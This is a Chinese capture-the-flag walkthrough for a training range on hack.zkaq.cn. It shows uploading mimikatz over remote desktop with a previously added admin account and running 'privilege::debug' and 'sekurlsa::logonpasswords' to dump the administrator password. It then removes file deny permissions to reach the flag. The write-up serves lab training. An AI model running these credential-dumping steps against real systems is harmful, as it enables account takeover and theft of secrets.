第七章、GET THE PASS！ - 走看看

zoukankan html css js c++ java

第七章、GET THE PASS！
第七章 GET THE PASS！

0x01. 明确目标
```
https://hack.zkaq.cn/battle/target?id=4eadc30136d08c33
```
既然是抓密码 , 那你还想啥 , mimikatz.exe搞起来

0x02. 上传mimikatz.exe

使用上一章添加管理员账号 , 然后远程桌面连接 , 然后上传 mimikatz

具体步骤
```
第零条 :  mimikatz.exe     // 启动工具  

第一条：privilege::debug  //提升权限

第二条：sekurlsa::logonpassWords  //抓取密码
```
administrator密码 :
```
wow!yougotit!
```
0x03. 获得flag

得到administrator密码 , 貌似不知道该干嘛了 , 我们用administrator账号远程连接一下嘿嘿看看有什么好玩的

好家伙 , 嘿嘿 , 双击打开试试

结果拒绝访问 , 修改一下权限

不单单要把Administrator的权限修改 , 还要把Administrators的权限也要修改一下 , 把拒绝一栏全部取消勾选

然后再次双击打开 , 得到信息

卧槽 , 默认压缩包也是没有权限解压的 , 按照之前的步骤 , 也是把拒绝一栏全部取消勾选 , 然后解压 , 打开

得到flag
```
FLAG{WOW!yougotit!}
```
查看全文

相关阅读:
shell命令编程小例
 汇编输出0255ascii码（VGA下）
linux程序时间控制小例
 Undefined exploded archive location 项目不能部署
 关于org.apache.jasper.JasperException: Unable to compile class for JSP问题的解决
 Some characters cannot be mapped using "GBK" character encoding 的解决办法
 如何处理Windows Forms程序中未处理的异常
 关于bos的edit页面的文件加载顺序
 关于unable to extend lob segment的问题解决方法
 从事ASP.NET开发两年多，谈谈对两三年工作经验的ASP.NET程序员的基本见解

原文地址：https://www.cnblogs.com/xcymn/p/15712481.html

Copyright © 2011-2022 走看看